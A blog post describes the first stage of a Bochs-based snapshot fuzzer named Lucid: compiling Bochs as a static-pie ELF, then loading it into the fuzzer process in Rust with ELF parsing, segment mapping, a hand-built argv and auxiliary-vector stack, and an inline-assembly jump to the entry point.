And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited gamozolabs (Brandon Falkβs) stream paper review he did on the Nyx paper. Itβs a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.
This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:
- it is relatively simple in its design,
- it allows for almost endless introspection utilities to be added,
- it lends itself well to iterative development cycles,
- it can scale and be used on my servers I bought for fuzzing (but havenβt used yet because I donβt have a fuzzer!),
- it can fuzz the Linux Kernel,
- it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
- it is pretty unique in its design compared to open source fuzzing tools that exist,
- it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
- there is no source code available anywhere publicly, so Iβm free to implement it from scratch the way I see fit,
- it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,
- it will allow me to do a lot of learning and low-level computing research and learning.
So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure heβd be ok with it as I didnβt want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and weβre off to developing the fuzzer.
Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.
Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.
Misc
Please let me know if you find any programming errors or have some nitpicks with the code. Iβve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also havenβt really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.
Iβve decided to name the project βLucidβ for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.
Bochs
What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, itβs a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMUβs approach of βletβs emulate anything and everything and do it with good performanceβ, Bochs has taken the approach of βletβs emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.
Fuzzer Architecture
This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a βfuzzerβ process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target systemβs simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.
Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our βfuzzerβ process. In an effort to isolate Bochs from the userβs OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID
or something similar. I actually havenβt given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.
Secondly, it also means that the entirety of Bochsβ state will be contained within our sandbox, which should enable us to reset Bochsβ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.
So in general, this is how our fuzzing setup should look:
In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, Iβve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Letβs dive into how that has been accomplished thus far.
Loading an ELF in Memory
So in order to make this portion of loading Bochs in memory in the most simplistic way possible, Iβve chosen to compile Bochs as a -static-pie
ELF. Now this means that the built ELF has no expectations about where it is loaded. In its _start
routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie
test program and make sure we can do that correctly.
In order to make sure we have everything correctly implemented, weβll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
printf("Argument count: %d\n", argc);
printf("Args:\n");
for (int i = 0; i < argc; i++) {
printf(" -%s\n", argv[i]);
}
size_t iters = 0;
while (1) {
printf("Test alive!\n");
sleep(1);
iters++;
if (iters > 5) { return 0; }
}
}
Remember, at this point we donβt sandbox our loaded program at all, all weβre trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that arenβt real issues if we jump straight into executing Bochs at this point.
So compiling the test
program and examining it with readelf -l
, we can see that there is actually a DYNAMIC
segment. Likely because of the relocations that need to be performed during the aforementioned _start
routine.
dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test
Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000008158 0x0000000000008158 R 0x1000
LOAD 0x0000000000009000 0x0000000000009000 0x0000000000009000
0x0000000000094d01 0x0000000000094d01 R E 0x1000
LOAD 0x000000000009e000 0x000000000009e000 0x000000000009e000
0x00000000000285e0 0x00000000000285e0 R 0x1000
LOAD 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000005350 0x0000000000006a80 RW 0x1000
DYNAMIC 0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
0x00000000000001b0 0x00000000000001b0 RW 0x8
NOTE 0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000300 0x0000000000000300 0x0000000000000300
0x0000000000000044 0x0000000000000044 R 0x4
TLS 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000000020 0x0000000000000060 R 0x8
GNU_PROPERTY 0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
0x0000000000001cbc 0x0000000000001cbc R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000003220 0x0000000000003220 R 0x1
Section to Segment mapping:
Segment Sections...
00 .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt
01 .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini
02 .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table
03 .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs
04 .dynamic
05 .note.gnu.property
06 .note.gnu.build-id .note.ABI-tag
07 .tdata .tbss
08 .note.gnu.property
09 .eh_frame_hdr
10
11 .tdata .init_array .fini_array .data.rel.ro .dynamic .got
So what portions of the this ELF image do we actually care about for our loading purposes? We probably donβt need most of this information to simply get the ELF loaded and running. At first, I didnβt know what I needed so I just parsed all of the ELF headers.
Keeping in mind that this ELF parsing code doesnβt need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.
ELF Headers
Iβve written ELF parsing code before, but didnβt really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, weβre not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:
// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
pub entry: u64,
pub phoff: u64,
pub shoff: u64,
pub phentsize: u16,
pub phnum: u16,
pub shentsize: u16,
pub shnum: u16,
pub shrstrndx: u16,
}
We really care about a few of these struct members. For one, we definitely need to know the entry
, this is where youβre supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff
. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff
, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum
and phentsize
come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.
A single program header, ie, a single entry in the array, can be synthesized into the following data structure:
#[derive(Debug)]
pub struct ProgramHeader {
pub typ: u32,
pub flags: u32,
pub offset: u64,
pub vaddr: u64,
pub paddr: u64,
pub filesz: u64,
pub memsz: u64,
pub align: u64,
}
These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD
, as these segments are the ones we have to account for when loading the ELF image. Take our readelf
output for example:
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000008158 0x0000000000008158 R 0x1000
LOAD 0x0000000000009000 0x0000000000009000 0x0000000000009000
0x0000000000094d01 0x0000000000094d01 R E 0x1000
LOAD 0x000000000009e000 0x000000000009e000 0x000000000009e000
0x00000000000285e0 0x00000000000285e0 R 0x1000
LOAD 0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
0x0000000000005350 0x0000000000006a80 RW 0x1000
We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:
Flags
describes the memory permissions this segment should have, we have 3 distinct memory protection schemesREAD
,READ | EXECUTE
, andREAD | WRITE
Offset
describes how far into the physical file contents we can expect to find this segmentPhysAddr
we donβt much care aboutVirtAddr
the virtual address this segment should be loaded at, you can tell that the first segment value for this is0x0000000000000000
which means that it has no expectations about where itβs to be loaded.MemSiz
how large the segment should be in virtual memoryAlign
how to align the segments in virtual memory
For our very simplistic use-case of only loading a -static-pie
ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.
Loading the ELF
Now that weβve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, Iβve chosen to only implement whatβs needed in a Linux environment, but thereβs no reason why we couldnβt load this ELF into our memory if we happened to be a Windows userland process. Thatβs kind of why this whole design is cool. At some point, maybe someone will want Windows support and weβll add it.
The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked LOAD
. We also have to keep in mind that there is some padding after the segments that arenβt page aligned, so to do this, I used the following logic:
// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
"Unable to read binary data from Bochs binary"))?;
// Parse ELF
let elf = parse_elf(&data)?;
// We need to iterate through all of the loadable program headers and
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
if ph.is_load() {
let end_addr = (ph.vaddr + ph.memsz) as usize;
if mapping_size < end_addr { mapping_size = end_addr; }
}
}
// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}
We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest βend_addr
β is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to mmap
to hold the loadable ELF segments. We mmap
a contiguous range of memory here:
// Call `mmap` to map memory into our process to hold all of the loadable
// program header contents in a contiguous range. Right now the perms will be
// generic across the entire range as PROT_WRITE,
// later we'll go back and `mprotect` them appropriately
fn initial_mmap(size: usize) -> Result<usize, LucidErr> {
// We don't want to specify a fixed address
let addr = LOAD_TARGET as *mut libc::c_void;
// Length is straight forward
let length = size as libc::size_t;
// Set the protections for now to writable
let prot = libc::PROT_WRITE;
// Set the flags, this is anonymous memory
let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;
// We don't have a file to map, so this is -1
let fd = -1 as libc::c_int;
// We don't specify an offset
let offset = 0 as libc::off_t;
// Call `mmap` and make sure it succeeds
let result = unsafe {
libc::mmap(
addr,
length,
prot,
flags,
fd,
offset
)
};
if result == libc::MAP_FAILED {
return Err(LucidErr::from("Failed to `mmap` memory for Bochs"));
}
Ok(result as usize)
}
So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a memcpy
from the file data in memory, to the carved out memory we just created. You can see that logic here:
let mut load_segments = Vec::new();
for ph in elf.program_headers.iter() {
if ph.is_load() {
load_segments.push((
ph.flags, // segment.0
ph.vaddr as usize, // segment.1
ph.memsz as usize, // segment.2
ph.offset as usize, // segment.3
ph.filesz as usize, // segment.4
));
}
}
After the segment metadata has been extracted, we can copy the contents over as well as call mprotect
on the segment in memory so that its permissions perfectly match the Flags
segment metadata we discussed earlier. That logic is here:
// Iterate through the loadable segments and change their perms and then
// copy the data over
for segment in load_segments.iter() {
// Copy the binary data over, the destination is where in our process
// memory we're copying the binary data to. The source is where we copy
// from, this is going to be an offset into the binary data in the file,
// len is going to be how much binary data is in the file, that's filesz
// This is going to be unsafe no matter what
let len = segment.4;
let dst = (addr + segment.1) as *mut u8;
let src = (elf.data[segment.3..segment.3 + len]).as_ptr();
unsafe {
std::ptr::copy_nonoverlapping(src, dst, len);
}
// Calculate the `mprotect` address by adding the mmap address plus the
// virtual address offset, we also mask off the last 0x1000 bytes so
// that we are always page-aligned as required by `mprotect`
let mprotect_addr = ((addr + segment.1) & !(PAGE_SIZE - 1))
as *mut libc::c_void;
// Get the length
let mprotect_len = segment.2 as libc::size_t;
// Get the protection
let mut mprotect_prot = 0 as libc::c_int;
if segment.0 & 0x1 == 0x1 { mprotect_prot |= libc::PROT_EXEC; }
if segment.0 & 0x2 == 0x2 { mprotect_prot |= libc::PROT_WRITE; }
if segment.0 & 0x4 == 0x4 { mprotect_prot |= libc::PROT_READ; }
// Call `mprotect` to change the mapping perms
let result = unsafe {
libc::mprotect(
mprotect_addr,
mprotect_len,
mprotect_prot
)
};
if result < 0 {
return Err(LucidErr::from("Failed to `mprotect` memory for Bochs"));
}
}
After that is successful, our ELF image is basically complete. We can just jump to it and start executing! Just kidding, we have to first setup a stack for the new βprocessβ which I learned was a huge pain.
Setting Up a Stack for Bochs
I spent a lot of time on this and there actually might still be bugs! This was the hardest part Iβd say as everything else was pretty much straightforward. To complete this part, I heavily leaned on this resource which describes how x86 32-bit application stacks are fabricated: https://articles.manugarg.com/aboutelfauxiliaryvectors.
Here is an extremely useful diagram describing the 32-bit stack cribbed from the linked resource above:
position content size (bytes) + comment
------------------------------------------------------------------------
stack pointer -> [ argc = number of args ] 4
[ argv[0] (pointer) ] 4 (program name)
[ argv[1] (pointer) ] 4
[ argv[..] (pointer) ] 4 * x
[ argv[n - 1] (pointer) ] 4
[ argv[n] (pointer) ] 4 (= NULL)
[ envp[0] (pointer) ] 4
[ envp[1] (pointer) ] 4
[ envp[..] (pointer) ] 4
[ envp[term] (pointer) ] 4 (= NULL)
[ auxv[0] (Elf32_auxv_t) ] 8
[ auxv[1] (Elf32_auxv_t) ] 8
[ auxv[..] (Elf32_auxv_t) ] 8
[ auxv[term] (Elf32_auxv_t) ] 8 (= AT_NULL vector)
[ padding ] 0 - 16
[ argument ASCIIZ strings ] >= 0
[ environment ASCIIZ str. ] >= 0
(0xbffffffc) [ end marker ] 4 (= NULL)
(0xc0000000) < bottom of stack > 0 (virtual)
------------------------------------------------------------------------
When we pass arguments to a process on the command line like ls / -laht
, the Linux OS has to load the ls
ELF into memory and create its environment. In this example, we passed a couple argument values to the process as well /
and -laht
. The way that the OS passes these arguments to the process is on the stack via the argument vector or argv
for short, which is an array of string pointers. The number of arguments is represented by the argument count or argc
. The first member of argv
is usually the name of the executable that was passed on the command line, so in our example it would be ls
. As you can see the first thing on the stack, the top of the stack, which is at the lower end of the address range of the stack, is argc
, followed by all the pointers to string data representing the program arguments. It is also important to note that the array is NULL
terminated at the end.
After that, we have a similar data structure with the envp
array, which is an array of pointers to string data representing environment variables. You can retrieve this data yourself by running a program under GDB and using the command show environment
, the environment variables are usually in the form βKEY=VALUEβ, for instance on my machine the key-value pair for the language environment variable is "LANG=en_US.UTF-8"
. For our purposes, we can ignore the environment variables. This vector is also NULL
terminated.
Next, is the auxiliary vector, which is extremely important to us. This information details several aspects of the program. These auxiliary entries in the vector are 16-bytes a piece. They comprise a key and a value just like our environment variable entries, but these are basically u64 values. For the test
program, we can actually dump the auxiliary information by using info aux
under GDB.
gefβ€ info aux
33 AT_SYSINFO_EHDR System-supplied DSO's ELF header 0x7ffff7f2e000
51 ??? 0xe30
16 AT_HWCAP Machine-dependent CPU capability hints 0x1f8bfbff
6 AT_PAGESZ System page size 4096
17 AT_CLKTCK Frequency of times() 100
3 AT_PHDR Program headers for program 0x7ffff7f30040
4 AT_PHENT Size of program header entry 56
5 AT_PHNUM Number of program headers 12
7 AT_BASE Base address of interpreter 0x0
8 AT_FLAGS Flags 0x0
9 AT_ENTRY Entry point of program 0x7ffff7f39f50
11 AT_UID Real user ID 1000
12 AT_EUID Effective user ID 1000
13 AT_GID Real group ID 1000
14 AT_EGID Effective group ID 1000
23 AT_SECURE Boolean, was exec setuid-like? 0
25 AT_RANDOM Address of 16 random bytes 0x7fffffffe3b9
26 AT_HWCAP2 Extension of AT_HWCAP 0x2
31 AT_EXECFN File name of executable 0x7fffffffefe2 "/home/dude/lucid/test"
15 AT_PLATFORM String identifying platform 0x7fffffffe3c9 "x86_64"
0 AT_NULL End of vector 0x0
The keys are on the left the values are on the right. For instance, on the stack we can expect the value 0x5 for AT_PHNUM
, which describes the number of Program Headers, to be accompanied by 12
as the value. We can dump the stack and see this in action as well.
gefβ€ x/400gx $rsp
0x7fffffffe0b0: 0x0000000000000001 0x00007fffffffe3d6
0x7fffffffe0c0: 0x0000000000000000 0x00007fffffffe3ec
0x7fffffffe0d0: 0x00007fffffffe3fc 0x00007fffffffe44e
0x7fffffffe0e0: 0x00007fffffffe461 0x00007fffffffe475
0x7fffffffe0f0: 0x00007fffffffe4a2 0x00007fffffffe4b9
0x7fffffffe100: 0x00007fffffffe4e5 0x00007fffffffe505
0x7fffffffe110: 0x00007fffffffe52e 0x00007fffffffe542
0x7fffffffe120: 0x00007fffffffe559 0x00007fffffffe56c
0x7fffffffe130: 0x00007fffffffe588 0x00007fffffffe59d
0x7fffffffe140: 0x00007fffffffe5b8 0x00007fffffffe5c5
0x7fffffffe150: 0x00007fffffffe5da 0x00007fffffffe60e
0x7fffffffe160: 0x00007fffffffe61d 0x00007fffffffe646
0x7fffffffe170: 0x00007fffffffe667 0x00007fffffffe674
0x7fffffffe180: 0x00007fffffffe67d 0x00007fffffffe68d
0x7fffffffe190: 0x00007fffffffe69b 0x00007fffffffe6ad
0x7fffffffe1a0: 0x00007fffffffe6be 0x00007fffffffeca0
0x7fffffffe1b0: 0x00007fffffffecc1 0x00007fffffffeccd
0x7fffffffe1c0: 0x00007fffffffecde 0x00007fffffffed34
0x7fffffffe1d0: 0x00007fffffffed63 0x00007fffffffed73
0x7fffffffe1e0: 0x00007fffffffed8b 0x00007fffffffedad
0x7fffffffe1f0: 0x00007fffffffedc4 0x00007fffffffedd8
0x7fffffffe200: 0x00007fffffffedf8 0x00007fffffffee02
0x7fffffffe210: 0x00007fffffffee21 0x00007fffffffee2c
0x7fffffffe220: 0x00007fffffffee34 0x00007fffffffee46
0x7fffffffe230: 0x00007fffffffee65 0x00007fffffffee7c
0x7fffffffe240: 0x00007fffffffeed1 0x00007fffffffef7b
0x7fffffffe250: 0x00007fffffffef8d 0x00007fffffffefc3
0x7fffffffe260: 0x0000000000000000 0x0000000000000021
0x7fffffffe270: 0x00007ffff7f2e000 0x0000000000000033
0x7fffffffe280: 0x0000000000000e30 0x0000000000000010
0x7fffffffe290: 0x000000001f8bfbff 0x0000000000000006
0x7fffffffe2a0: 0x0000000000001000 0x0000000000000011
0x7fffffffe2b0: 0x0000000000000064 0x0000000000000003
0x7fffffffe2c0: 0x00007ffff7f30040 0x0000000000000004
0x7fffffffe2d0: 0x0000000000000038 0x0000000000000005
0x7fffffffe2e0: 0x000000000000000c 0x0000000000000007
You can see the towards the end of the data at 0x7fffffffe2d8
we can see the key 0x5
, and at 0x7fffffffe2e0
we can see the value 0xc
which is 12 in hex. We need some of these in order to load our ELF properly as the ELF _start
routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:
AT_ENTRY
which holds the program entry point,AT_PHDR
which is a pointer to the program header data,AT_PHNUM
which is the number of program headers,AT_RANDOM
which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of0x4141414141414141
and ended up crashing trying to access that address. For our purposes, we donβt really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.AT_NULL
which is used to terminate the auxiliary vector
So with those values all accounted for, we now know all of the data we need to construct the programβs stack.
Allocating the Stack
First, we need to allocate memory to hold the Bochs stack since we will need to know the address itβs mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we wonβt know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap
the same way we did with the program segments. Right now Iβm using a 1MB
stack which seems to be large enough.
Constructing the Stack Data
In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.
So the first value we place onto the stack is the βend-markerβ from the diagram which is just a 0u64
in Rust.
Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args
which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args
is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv
vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didnβt have to deal with any weird pointer values. This isnβt necessary but makes the stack state easier for me to reason about. This is performed with the following logic:
// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();
// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);
// Parse the argv entries for Bochs
let args = parse_bochs_args();
// Store the length of the strings including padding
let mut arg_lens = Vec::new();
// For each argument, push a string onto the stack and store its offset
// location
for arg in args.iter() {
let old_len = stack_data.len();
push_string(&mut stack_data, arg.to_string());
// Calculate arg length and store it
let arg_len = stack_data.len() - old_len;
arg_lens.push(arg_len);
}
Pushing strings is performed like this:
// Pushes a NULL terminated string onto the "stack" and pads the string with
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
// Convert the string to bytes and append it to the stack
let mut bytes = string.as_bytes().to_vec();
// Add a NULL terminator
bytes.push(0x0);
// We're adding bytes in reverse because we're adding to index 0 always,
// we want to pad these strings so that they remain 8-byte aligned so that
// the stack is easier to reason about imo
if bytes.len() % U64_SIZE > 0 {
let pad = U64_SIZE - (bytes.len() % U64_SIZE);
for _ in 0..pad { bytes.push(0x0); }
}
for &byte in bytes.iter().rev() {
stack.insert(0, byte);
}
}
Then we add some padding and the auxiliary vector members:
// Add some padding
push_u64(&mut stack_data, 0u64);
// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);
// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);
// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);
// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);
// Add AT_RANDOM key which is 25, this is where the start routines will
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);
Then, since we ignored the environment variables, we just push a NULL
pointer onto the stack and also the NULL
pointer terminating the argv
vector:
// Since we skipped ennvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);
// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);
This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc
). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv
pointers onto the stack. We calculate the length as follows:
// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();
// Add argv pointers
stack_length += args.len() * POINTER_SIZE;
// Add argc
stack_length += std::mem::size_of::<u64>();
Next, we start at the bottom of the stack and create a movable offset
which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset
represents how deep into the stack from the top we are. At first, the offset
is the largest value it can be because itβs at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv
string we pushed onto the stack. So the bottom of the stack looks something like this:
NULL
string_1
string_2
end-marker <--- offset
So armed with the arguments and their lengths that we recorded, we can adjust the offset
each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:
// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accomdate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accomodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
// First argument, account for end-marker
if idx == 0 {
curr_offset -= arg_len + U64_SIZE;
}
// Not the first argument, just account for the string length
else {
curr_offset -= arg_len;
}
// Calculate the absolute address
let absolute_addr = (stack_addr + curr_offset) as u64;
// Push the absolute address onto the stack
push_u64(&mut stack_data, absolute_addr);
}
Itβs pretty cool! And it seems to work? Finally we cap the stack off with argc
and we are done populating all of the stack data in a vector. Next, weβll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.
The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX
and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP
when we jump to the program in memory and start executing. RSP
is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX
. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.
Executing the Loaded Program
Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I havenβt fleshed out a context switching routine or anything weβre literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:
pub fn start_bochs(bochs: Bochs) {
// Set RAX to our jump destination which is the program entry, clear RDX,
// and set RSP to the correct value
unsafe {
asm!(
"mov rax, {0}",
"mov rsp, {1}",
"xor rdx, rdx",
"jmp rax",
in(reg) bochs.entry,
in(reg) bochs.rsp,
);
}
}
The reason we clear RDX
is because if the _start
routine sees a non-zero value in RDX
, it will interpret that to mean that we are attempting to register a hook located at the address in RDX
to be invoked when the program exits, we donβt have one we want to run so for now we NULL
it out. The other register values donβt really matter. We move the program entry point into RAX
and use it as a long jump target and we supply our handcrafted RSP
so that the program has a stack to use to do its relocations and run properly.
dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
-./bochs
--AAAAA
--BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$
The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curiousβ¦
Will Bochs Run?
We have to see right? First we have to compile Bochs as a -static-pie
ELF which was a headache in itself, but I was able to figure it out.
ude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
Bochs x86 Emulator 2.7
Built from SVN snapshot on August 1, 2021
Timestamp: Sun Aug 1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]
-n no configuration file
-f configfile specify configuration file
-q quick start (skip configuration interface)
-benchmark N run Bochs in benchmark mode for N millions of emulated ticks
-dumpstats N dump Bochs stats every N millions of emulated ticks
